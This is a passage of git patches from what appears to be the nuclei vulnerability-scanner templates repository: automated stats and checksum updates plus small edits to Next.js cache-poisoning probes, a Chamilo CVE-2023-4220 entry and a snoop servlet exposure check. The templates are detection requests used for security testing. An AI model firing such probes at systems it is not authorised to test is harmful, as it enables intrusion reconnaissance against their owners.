1 | | | | | | | | | +| biostar | 1 | | | | | | | | | +| pagekit | 1 | | | | | | | | | +| vtiger | 1 | | | | | | | | | +| game-debate | 1 | | | | | | | | | +| mastodon-api | 1 | | | | | | | | | +| acf_to_rest_api_project | 1 | | | | | | | | | +| temporal | 1 | | | | | | | | | +| helmet-store-showroom | 1 | | | | | | | | | +| dynamic | 1 | | | | | | | | | +| wiki-js | 1 | | | | | | | | | +| sentinelone | 1 | | | | | | | | | +| gdidees | 1 | | | | | | | | | +| wp-tripadvisor-review-slider | 1 | | | | | | | | | +| goodlayers | 1 | | | | | | | | | +| brave | 1 | | | | | | | | | +| bodybuildingcom | 1 | | | | | | | | | +| acsoft | 1 | | | | | | | | | +| lokalise | 1 | | | | | | | | | +| geolocation | 1 | | | | | | | | | +| contest-gallery | 1 | | | | | | | | | +| novius | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| ru-123rf | 1 | | | | | | | | | +| karma | 1 | | | | | | | | | +| hydra_project | 1 | | | | | | | | | +| muck-rack | 1 | | | | | | | | | +| launchdarkly | 1 | | | | | | | | | +| cryptobox | 1 | | | | | | | | | +| wp-limit-failed-login-attempts | 1 | | | | | | | | | +| canal | 1 | | | | | | | | | +| switching | 1 | | | | | | | | | +| bacnet | 1 | | | | | | | | | +| virtual-smartzone | 1 | | | | | | | | | +| streamelements | 1 | | | | | | | | | +| mailoney | 1 | | | | | | | | | +| mybuildercom | 1 | | | | | | | | | +| piekielni | 1 | | | | | | | | | +| demon | 1 | | | | | | | | | +| unbit | 1 | | | | | | | | | +| konghq | 1 | | | | | | | | | +| aerocms | 1 | | | | | | | | | +| phppgadmin_project | 1 | | | | | | | | | +| ispyconnect | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| sumo | 1 | | | | | | | | | +| rsi | 1 | | | | | | | | | +| threads | 1 | | | | | | | | | +| show-all-comments-in-one-page | 1 | | | | | | | | | +| orbintelligence | 1 | | | | | | | | | +| webtoprint | 1 | | | | | | | | | +| julia | 1 | | | | | | | | | +| ipinfo | 1 | | | | | | | | | +| wrteam | 1 | | | | | | | | | +| misp | 1 | | | | | | | | | +| jreport | 1 | | | | | | | | | +| phpwind | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| xfinity | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| dashlane | 1 | | | | | | | | | +| adultism | 1 | | | | | | | | | +| quitterpl | 1 | | | | | | | | | +| sahipro | 1 | | | | | | | | | +| jrecms | 1 | | | | | | | | | +| webshell4 | 1 | | | | | | | | | +| wpa2 | 1 | | | | | | | | | +| vivotex | 1 | | | | | | | | | +| prismaweb | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| dionesoft | 1 | | | | | | | | | +| booked | 1 | | | | | | | | | +| oauth2 | 1 | | | | | | | | | +| opencti | 1 | | | | | | | | | +| heator | 1 | | | | | | | | | +| ndkdesign | 1 | | | | | | | | | +| slackholes | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| mastodonchasedemdev-mastodon-instance | 1 | | | | | | | | | +| chomikujpl | 1 | | | | | | | | | +| cvent | 1 | | | | | | | | | +| najeebmedia | 1 | | | | | | | | | +| cubecoders | 1 | | | | | | | | | +| openmediavault | 1 | | | | | | | | | +| domos | 1 | | | | | | | | | +| documentcloud | 1 | | | | | | | | | +| gumroad | 1 | | | | | | | | | +| quickcms | 1 | | | | | | | | | +| mobile | 1 | | | | | | | | | +| wireclub | 1 | | | | | | | | | +| cdapl | 1 | | | | | | | | | +| advanced_comment_system_project | 1 | | | | | | | | | +| foliovision | 1 | | | | | | | | | +| simpleclientmanagement | 1 | | | | | | | | | +| lms | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| kingdee | 1 | | | | | | | | | +| helpdesk_pro_project | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| carrcommunications | 1 | | | | | | | | | +| ecosys | 1 | | | | | | | | | +| lamp | 1 | | | | | | | | | +| memrise | 1 | | | | | | | | | +| catchplugins | 1 | | | | | | | | | +| justfans | 1 | | | | | | | | | +| identity_provider | 1 | | | | | | | | | +| natemail | 1 | | | | | | | | | +| opinio | 1 | | | | | | | | | +| land-software | 1 | | | | | | | | | +| simply-schedule-appointments | 1 | | | | | | | | | +| zitec | 1 | | | | | | | | | +| meshcentral | 1 | | | | | | | | | +| seeyon-oa | 1 | | | | | | | | | +| topapplb | 1 | | | | | | | | | +| red-leaves | 1 | | | | | | | | | +| notificationx-sql-injection | 1 | | | | | | | | | +| sp-client-document-manager | 1 | | | | | | | | | +| art_gallery_management_system_project | 1 | | | | | | | | | +| ignition | 1 | | | | | | | | | +| zerodium | 1 | | | | | | | | | +| openv500 | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| powertek | 1 | | | | | | | | | +| ipanel | 1 | | | | | | | | | +| mtheme | 1 | | | | | | | | | +| klogserver | 1 | | | | | | | | | +| cyberoamworks | 1 | | | | | | | | | +| bower | 1 | | | | | | | | | +| business | 1 | | | | | | | | | +| tracing | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 52872ce8f0..377b60e4d4 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------| -| cve | 2540 | dhiyaneshdk | 1334 | http | 7593 | info | 3780 | file | 402 | -| panel | 1163 | daffainfo | 864 | file | 402 | high | 1786 | dns | 25 | -| wordpress | 996 | dwisiswant0 | 803 | workflows | 191 | medium | 1560 | | | -| exposure | 955 | pussycat0x | 430 | network | 135 | critical | 1058 | | | -| xss | 913 | ritikchaddha | 366 | cloud | 134 | low | 268 | | | -| wp-plugin | 865 | pikpikcu | 353 | code | 81 | unknown | 39 | | | -| osint | 804 | princechaddha | 303 | javascript | 60 | | | | | -| tech | 694 | pdteam | 297 | ssl | 29 | | | | | -| lfi | 670 | ricardomaia | 238 | dns | 22 | | | | | -| misconfig | 660 | geeknik | 231 | dast | 22 | | | | | +| cve | 2571 | dhiyaneshdk | 1351 | http | 7663 | info | 3789 | file | 402 | +| panel | 1167 | daffainfo | 864 | file | 402 | high | 1816 | dns | 25 | +| wordpress | 1002 | dwisiswant0 | 803 | workflows | 191 | medium | 1578 | | | +| exposure | 968 | pussycat0x | 439 | network | 135 | critical | 1071 | | | +| xss | 917 | ritikchaddha | 380 | cloud | 134 | low | 271 | | | +| wp-plugin | 872 | pikpikcu | 353 | code | 81 | unknown | 40 | | | +| osint | 804 | princechaddha | 303 | javascript | 61 | | | | | +| tech | 698 | pdteam | 297 | ssl | 29 | | | | | +| lfi | 678 | ricardomaia | 239 | dast | 25 | | | | | +| misconfig | 673 | geeknik | 231 | dns | 22 | | | | | From 072a8da2d409f778c2418bf9958b63ea4edab06f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 13:28:50 +0000 Subject: [PATCH 1087/1841] Auto README Update [Wed Jul 10 13:28:50 UTC 2024] :robot: --- README.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/README.md b/README.md index 185e36d577..5670add9a3 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------| -| cve | 2540 | dhiyaneshdk | 1334 | http | 7593 | info | 3780 | file | 402 | -| panel | 1163 | daffainfo | 864 | file | 402 | high | 1786 | dns | 25 | -| wordpress | 996 | dwisiswant0 | 803 | workflows | 191 | medium | 1560 | | | -| exposure | 955 | pussycat0x | 430 | network | 135 | critical | 1058 | | | -| xss | 913 | ritikchaddha | 366 | cloud | 134 | low | 268 | | | -| wp-plugin | 865 | pikpikcu | 353 | code | 81 | unknown | 39 | | | -| osint | 804 | princechaddha | 303 | javascript | 60 | | | | | -| tech | 694 | pdteam | 297 | ssl | 29 | | | | | -| lfi | 670 | ricardomaia | 238 | dns | 22 | | | | | -| misconfig | 660 | geeknik | 231 | dast | 22 | | | | | +| cve | 2571 | dhiyaneshdk | 1351 | http | 7663 | info | 3789 | file | 402 | +| panel | 1167 | daffainfo | 864 | file | 402 | high | 1816 | dns | 25 | +| wordpress | 1002 | dwisiswant0 | 803 | workflows | 191 | medium | 1578 | | | +| exposure | 968 | pussycat0x | 439 | network | 135 | critical | 1071 | | | +| xss | 917 | ritikchaddha | 380 | cloud | 134 | low | 271 | | | +| wp-plugin | 872 | pikpikcu | 353 | code | 81 | unknown | 40 | | | +| osint | 804 | princechaddha | 303 | javascript | 61 | | | | | +| tech | 698 | pdteam | 297 | ssl | 29 | | | | | +| lfi | 678 | ricardomaia | 239 | dast | 25 | | | | | +| misconfig | 673 | geeknik | 231 | dns | 22 | | | | | -**656 directories, 8984 files**. +**663 directories, 9059 files**. From e4b8efd1e1cfa831751b702f6264613ad50eaf22 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 10 Jul 2024 23:39:17 +0530 Subject: [PATCH 1088/1841] Update nextjs-rsc-cache.yaml --- http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml | 12 ++++-------- 1 file changed, 4 insertions(+), 8 deletions(-) diff --git a/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml b/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml index 9597d2d30f..ca5ee6b84b 100644 --- a/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml +++ b/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml @@ -1,7 +1,7 @@ id: nextjs-rsc-cache info: - name: Next.js Cache Poisoning using RSC + name: Next.js - Cache Poisoning author: DhiyaneshDk severity: high reference: @@ -15,7 +15,7 @@ info: - http.html:"/_next/static" - cpe:"cpe:2.3:a:zeit:next.js" fofa-query: body="/_next/static" - tags: next-js,cache + tags: nextjs,cache variables: rand: "{{rand_text_numeric(5)}}" @@ -25,22 +25,18 @@ http: - | GET /?cb={{rand}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Priority: u=1 Rsc: 1 - | - @timeout: 5s + @timeout: 10s GET /?cb={{rand}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Priority: u=1 Rsc: 1 - | - @timeout: 5s + @timeout: 10s GET /?cb={{rand}} HTTP/1.1 Host: {{Hostname}} From 0f98f845dd776edb8147cea719e000d07e7cab66 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 10 Jul 2024 23:41:00 +0530 Subject: [PATCH 1089/1841] Update nextjs-middleware-cache.yaml --- .../nextjs/nextjs-middleware-cache.yaml | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) diff --git a/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml b/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml index 78b95503f8..ee2bd67def 100644 --- a/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml +++ b/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml @@ -1,9 +1,11 @@ id: nextjs-middleware-cache info: - name: Next.js Cache Poisoning using X-Middleware-Prefetch + name: Next.js - Cache Poisoning author: DhiyaneshDk severity: high + description: | + Next.js is vulnerable to Cache Poisoning using X-Middleware-Prefetch. reference: - https://zhero-web-sec.github.io/research-and-things/nextjs-and-cache-poisoning-a-quest-for-the-black-hole metadata: @@ -25,22 +27,18 @@ http: - | GET /?cb={{rand}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Middleware-Prefetch: 1 Priority: u=1 - | - @timeout: 5s + @timeout: 10s GET /?cb={{rand}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Middleware-Prefetch: 1 Priority: u=1 - | - @timeout: 5s + @timeout: 10s GET /?cb={{rand}} HTTP/1.1 Host: {{Hostname}} From bfdd36b3663c492f96d535dd087be91914411351 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 10 Jul 2024 23:42:07 +0530 Subject: [PATCH 1090/1841] Update CVE-2023-4220.yaml --- http/cves/2023/CVE-2023-4220.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-4220.yaml b/http/cves/2023/CVE-2023-4220.yaml index 3f69ea23a4..4529ba4632 100644 --- a/http/cves/2023/CVE-2023-4220.yaml +++ b/http/cves/2023/CVE-2023-4220.yaml @@ -8,9 +8,9 @@ info: Unrestricted file upload in big file upload functionality in `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` in Chamilo LMS <= v1.11.24 allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution via uploading of web shell. reference: - https://github.com/Ziad-Sakr/Chamilo-LMS-CVE-2023-4220-Exploit - - https://nvd.nist.gov/vuln/detail/CVE-2023-4220 - https://github.com/charlesgargasson/CVE-2023-4220 - https://starlabs.sg/advisories/23/23-4220/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-4220 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -20,6 +20,7 @@ info: epss-percentile: 0.52876 cpe: cpe:2.3:a:chamilo:chamilo_lms:*:*:*:*:*:*:*:* metadata: + max-request: 2 vendor: chamilo product: chamilo_lms shodan-query: "X-Powered-By: Chamilo" From 502fa6948cfe45c8f24bc2f4b191c4b1cdab7929 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 10 Jul 2024 23:42:57 +0530 Subject: [PATCH 1091/1841] added desc. --- http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml b/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml index ca5ee6b84b..6389b4aca4 100644 --- a/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml +++ b/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml @@ -4,6 +4,8 @@ info: name: Next.js - Cache Poisoning author: DhiyaneshDk severity: high + description: | + Next.js is vulnerable to Cache Poisoning using RSC. reference: - https://zhero-web-sec.github.io/research-and-things/nextjs-and-cache-poisoning-a-quest-for-the-black-hole metadata: From d1ebe94cfa6ac6e4858b36bde2a98fc9aeece7a5 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 10 Jul 2024 18:13:56 +0000 Subject: [PATCH 1092/1841] Auto Generated New Template Addition List [Wed Jul 10 18:13:56 UTC 2024] :robot: --- .new-additions | 76 +------------------------------------------------- 1 file changed, 1 insertion(+), 75 deletions(-) diff --git a/.new-additions b/.new-additions index 27ea1e9e24..a2d790ddcc 100644 --- a/.new-additions +++ b/.new-additions @@ -1,75 +1 @@ -dast/cves/2022/spring4shell-CVE-2022-22965.yaml -dast/vulnerabilities/injection/csv-injection.yaml -dast/vulnerabilities/injection/xinclude-injection.yaml -http/cnvd/2023/CNVD-2023-03903.yaml -http/cnvd/2024/CNVD-2021-64035.yaml -http/cves/2020/CVE-2020-10189.yaml -http/cves/2023/CVE-2023-3380.yaml -http/cves/2023/CVE-2023-35156.yaml -http/cves/2023/CVE-2023-35159.yaml -http/cves/2023/CVE-2023-35160.yaml -http/cves/2023/CVE-2023-35161.yaml -http/cves/2023/CVE-2023-41599.yaml -http/cves/2023/CVE-2023-47117.yaml -http/cves/2023/CVE-2023-52251.yaml -http/cves/2024/CVE-2024-25852.yaml -http/cves/2024/CVE-2024-27292.yaml -http/cves/2024/CVE-2024-29972.yaml -http/cves/2024/CVE-2024-32709.yaml -http/cves/2024/CVE-2024-33113.yaml -http/cves/2024/CVE-2024-33605.yaml -http/cves/2024/CVE-2024-33610.yaml -http/cves/2024/CVE-2024-34102.yaml -http/cves/2024/CVE-2024-36401.yaml -http/cves/2024/CVE-2024-36991.yaml -http/cves/2024/CVE-2024-37032.yaml -http/cves/2024/CVE-2024-37152.yaml -http/cves/2024/CVE-2024-37881.yaml -http/cves/2024/CVE-2024-4434.yaml -http/cves/2024/CVE-2024-4836.yaml -http/cves/2024/CVE-2024-5084.yaml -http/cves/2024/CVE-2024-5522.yaml -http/cves/2024/CVE-2024-5947.yaml -http/cves/2024/CVE-2024-6028.yaml -http/cves/2024/CVE-2024-6188.yaml -http/default-logins/apache/apache-apollo-default-login.yaml -http/default-logins/caprover/caprover-default-login.yaml -http/default-logins/dialogic/dialogic-xms-default-login.yaml -http/default-logins/jeedom/jeedom-default-login.yaml -http/default-logins/ruijie/ruijie-nbr-default-login.yaml -http/exposed-panels/apache/apache-apollo-panel.yaml -http/exposed-panels/dialogic-xms-console.yaml -http/exposed-panels/endpoint-protector-panel.yaml -http/exposed-panels/label-studio-panel.yaml -http/exposures/backups/sql-server-dump.yaml -http/exposures/configs/apache-pinot-config.yaml -http/exposures/configs/filestash-admin-config.yaml -http/exposures/configs/neo4j-neodash-config.yaml -http/exposures/tokens/jwk-json-leak.yaml -http/misconfiguration/coolify-register-account.yaml -http/misconfiguration/forgejo-repo-exposure.yaml -http/misconfiguration/installer/kodbox-installer.yaml -http/misconfiguration/installer/piwigo-installer.yaml -http/misconfiguration/installer/poste-io-installer.yaml -http/misconfiguration/installer/subrion-installer.yaml -http/misconfiguration/label-studio-signup.yaml -http/misconfiguration/laragon-phpinfo.yaml -http/misconfiguration/seq-dashboard-unath.yaml -http/technologies/apache/apache-cloudstack-detect.yaml -http/technologies/apache/apache-pinot-detect.yaml -http/technologies/neo4j-neodash-detect.yaml -http/technologies/wordpress/plugins/chaty.yaml -http/vulnerabilities/backdoor/polyfill-backdoor.yaml -http/vulnerabilities/hjsoft/hjsoft-hcm-lfi.yaml -http/vulnerabilities/hjsoft/hjsoft-hcm-sqli.yaml -http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml -http/vulnerabilities/jinhe/jinhe-oa-c6-upload-lfi.yaml -http/vulnerabilities/next-js-cache-poisoning.yaml -http/vulnerabilities/other/azon-dominator-sqli.yaml -http/vulnerabilities/other/bagisto-csti.yaml -http/vulnerabilities/other/crocus-lfi.yaml -http/vulnerabilities/other/enjoyrmis-sqli.yaml -http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml -http/vulnerabilities/other/pingsheng-electronic-sqli.yaml -http/vulnerabilities/other/sharp-printers-lfi.yaml -javascript/enumeration/ldap/ldap-metadata.yaml +http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml From c851c8799cc4c8d22a530e8beb57a38f919ad9ba Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 18:14:08 +0000 Subject: [PATCH 1093/1841] Auto Generated Templates Checksum [Wed Jul 10 18:14:08 UTC 2024] :robot: --- templates-checksum.txt | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ff788488c7..8d84c7a7cd 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2,11 +2,11 @@ CODE_OF_CONDUCT.md:5c581b341cecd31ea4a275098ec84be9951f1593 CONTRIBUTING.md:a280fa8badd8622a481e1bb7f492dd82ac05ea71 LICENSE.md:48790f08ca6757688e2f5f3f4b017a073b3e20df PULL_REQUEST_TEMPLATE.md:c8aba78d67442f639483a10fa74681dea94faeb7 -README.md:98bddb6b4dbb0865961b2194f708b03ea1c7a1c2 +README.md:49276d7e139dd9802214cad0b9cb41f6fe6c9da5 README_KR.md:174470dbc5c69e81f83ff816655a52cc8c5d7f26 -TEMPLATES-STATS.json:c6059846080f49ae10a66cecf51cbccc534786f4 -TEMPLATES-STATS.md:78b61fd6c62a52c0153c649fca26c0dff16d3a7e -TOP-10.md:4844aeabdab16b516603f50126c216b7b69c2743 +TEMPLATES-STATS.json:41391c1eb4a099a83a3e69f746af2cea0724e077 +TEMPLATES-STATS.md:951e805f89f9349e5cc0471b1d99331b29a3ca0c +TOP-10.md:5a847073660f6446f71bc9189fd4ea94d68bc20a cloud/aws/acm/acm-cert-expired.yaml:5c2330bf9034cad5cde868b85128ba737f45c37f cloud/aws/acm/acm-cert-renewal-30days.yaml:ad88137bc1382a729e7b3f3a0172aab684af2743 cloud/aws/acm/acm-cert-renewal-45days.yaml:0cb9388dd736046c47748a973e9092c12ada2f79 @@ -7922,6 +7922,7 @@ http/vulnerabilities/netmizer/netmizer-data-listing.yaml:86b5ea2ca47dcb2b20aeff8 http/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml:850c786f4ac75d6deeefe602a60f94435d7cab07 http/vulnerabilities/netsweeper/netsweeper-rxss.yaml:7ee726ace09d4659b2f3980105a638c57fb0114d http/vulnerabilities/next-js-cache-poisoning.yaml:e0d43aad92facaed305db447f27dec8dc929465a +http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml:b84ccea8bafe2e592ec927fe3fc13348d4881f39 http/vulnerabilities/nps/nps-auth-bypass.yaml:90ea2e05d4bf385db0ceee0c92415817731d8a15 http/vulnerabilities/nuxt/nuxt-js-lfi.yaml:d51646219a3065dbf4024260104c2513d9e516d3 http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml:24cfa8b0b2dbd99b1eb75704e139da55e275274f @@ -8009,7 +8010,7 @@ http/vulnerabilities/other/elFinder-path-traversal.yaml:9c9ea74d1312aada35ec1821 http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml:7b2eac74efc5e020858690936c34ea3c3879b3f9 http/vulnerabilities/other/empirecms-xss.yaml:1dd42b3c178c08112a55a795637916ae0ad19302 http/vulnerabilities/other/ems-sqli.yaml:5041a04bd1dddfaa7461e369509b318dda871c4d -http/vulnerabilities/other/enjoyrmis-sqli.yaml:577035f2527555a69ee341462e68485e54748a8d +http/vulnerabilities/other/enjoyrmis-sqli.yaml:10b4c83409aa50fed78065b26ab34a7c8f6aa631 http/vulnerabilities/other/ep-web-cms-xss.yaml:9b9f26659fe3486aeb093bff5874b1f9900df616 http/vulnerabilities/other/epp-server-lfi.yaml:73d70e01fa3888f4152dddbf72025699ec7a7cda http/vulnerabilities/other/erensoft-sqli.yaml:2db8e70b395c704b4ba339d911330f5fd8d5ae23 @@ -8864,7 +8865,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8cdeacbe92a6e6e04f470f6e40d622e2d444e53d +templates-checksum.txt:7890ab792f534422afdc4500b1d80803cce74f0b wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 0e8dfa9c6d5cc9bfad33193f3eb55311886a744c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 10 Jul 2024 23:44:21 +0530 Subject: [PATCH 1094/1841] Update snoop-servlet-exposure.yaml --- http/exposures/configs/snoop-servlet-exposure.yaml | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/http/exposures/configs/snoop-servlet-exposure.yaml b/http/exposures/configs/snoop-servlet-exposure.yaml index 5ff4d3f827..166a8c3c9b 100644 --- a/http/exposures/configs/snoop-servlet-exposure.yaml +++ b/http/exposures/configs/snoop-servlet-exposure.yaml @@ -1,20 +1,24 @@ id: snoop-servlet info: - name: Snoop Servlet information disclosure + name: Snoop Servlet - Information Disclosure author: omranisecurity severity: low - description: The Snoop Servlet returns information about the HTTP request itself and sometimes. It could help an attacker to prepare more advanced attacks. - reference: https://www.acunetix.com/vulnerabilities/web/snoop-servlet-information-disclosure/ + description: | + The Snoop Servlet returns information about the HTTP request itself and sometimes. It could help an attacker to prepare more advanced attacks. + reference: + - https://www.acunetix.com/vulnerabilities/\web/snoop-servlet-information-disclosure/ metadata: - shodan-query: http.title:"Snoop Servlet" - fofa-query: title=="Snoop Servlet" + max-request: 1 + shodan-query: title:"Snoop Servlet" + fofa-query: title="Snoop Servlet" tags: config,exposure,snoop,snoop-servlet http: - method: GET path: - "{{BaseURL}}/snoop" + matchers: - type: dsl dsl: From 7035d2e6887a6218c0305337f81c15a9da689830 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 10 Jul 2024 18:14:41 +0000 Subject: [PATCH 1095/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 76 +--------------------------- 1 file changed, 1 insertion(+), 75 deletions(-) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index e8d7b6b2f6..d92152ac8d 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,81 +3,7 @@ on: push: paths: - '.new-additions' - - 'dast/cves/2022/spring4shell-CVE-2022-22965.yaml' - - 'dast/vulnerabilities/injection/csv-injection.yaml' - - 'dast/vulnerabilities/injection/xinclude-injection.yaml' - - 'http/cnvd/2023/CNVD-2023-03903.yaml' - - 'http/cnvd/2024/CNVD-2021-64035.yaml' - - 'http/cves/2020/CVE-2020-10189.yaml' - - 'http/cves/2023/CVE-2023-3380.yaml' - - 'http/cves/2023/CVE-2023-35156.yaml' - - 'http/cves/2023/CVE-2023-35159.yaml' - - 'http/cves/2023/CVE-2023-35160.yaml' - - 'http/cves/2023/CVE-2023-35161.yaml' - - 'http/cves/2023/CVE-2023-41599.yaml' - - 'http/cves/2023/CVE-2023-47117.yaml' - - 'http/cves/2023/CVE-2023-52251.yaml' - - 'http/cves/2024/CVE-2024-25852.yaml' - - 'http/cves/2024/CVE-2024-27292.yaml' - - 'http/cves/2024/CVE-2024-29972.yaml' - - 'http/cves/2024/CVE-2024-32709.yaml' - - 'http/cves/2024/CVE-2024-33113.yaml' - - 'http/cves/2024/CVE-2024-33605.yaml' - - 'http/cves/2024/CVE-2024-33610.yaml' - - 'http/cves/2024/CVE-2024-34102.yaml' - - 'http/cves/2024/CVE-2024-36401.yaml' - - 'http/cves/2024/CVE-2024-36991.yaml' - - 'http/cves/2024/CVE-2024-37032.yaml' - - 'http/cves/2024/CVE-2024-37152.yaml' - - 'http/cves/2024/CVE-2024-37881.yaml' - - 'http/cves/2024/CVE-2024-4434.yaml' - - 'http/cves/2024/CVE-2024-4836.yaml' - - 'http/cves/2024/CVE-2024-5084.yaml' - - 'http/cves/2024/CVE-2024-5522.yaml' - - 'http/cves/2024/CVE-2024-5947.yaml' - - 'http/cves/2024/CVE-2024-6028.yaml' - - 'http/cves/2024/CVE-2024-6188.yaml' - - 'http/default-logins/apache/apache-apollo-default-login.yaml' - - 'http/default-logins/caprover/caprover-default-login.yaml' - - 'http/default-logins/dialogic/dialogic-xms-default-login.yaml' - - 'http/default-logins/jeedom/jeedom-default-login.yaml' - - 'http/default-logins/ruijie/ruijie-nbr-default-login.yaml' - - 'http/exposed-panels/apache/apache-apollo-panel.yaml' - - 'http/exposed-panels/dialogic-xms-console.yaml' - - 'http/exposed-panels/endpoint-protector-panel.yaml' - - 'http/exposed-panels/label-studio-panel.yaml' - - 'http/exposures/backups/sql-server-dump.yaml' - - 'http/exposures/configs/apache-pinot-config.yaml' - - 'http/exposures/configs/filestash-admin-config.yaml' - - 'http/exposures/configs/neo4j-neodash-config.yaml' - - 'http/exposures/tokens/jwk-json-leak.yaml' - - 'http/misconfiguration/coolify-register-account.yaml' - - 'http/misconfiguration/forgejo-repo-exposure.yaml' - - 'http/misconfiguration/installer/kodbox-installer.yaml' - - 'http/misconfiguration/installer/piwigo-installer.yaml' - - 'http/misconfiguration/installer/poste-io-installer.yaml' - - 'http/misconfiguration/installer/subrion-installer.yaml' - - 'http/misconfiguration/label-studio-signup.yaml' - - 'http/misconfiguration/laragon-phpinfo.yaml' - - 'http/misconfiguration/seq-dashboard-unath.yaml' - - 'http/technologies/apache/apache-cloudstack-detect.yaml' - - 'http/technologies/apache/apache-pinot-detect.yaml' - - 'http/technologies/neo4j-neodash-detect.yaml' - - 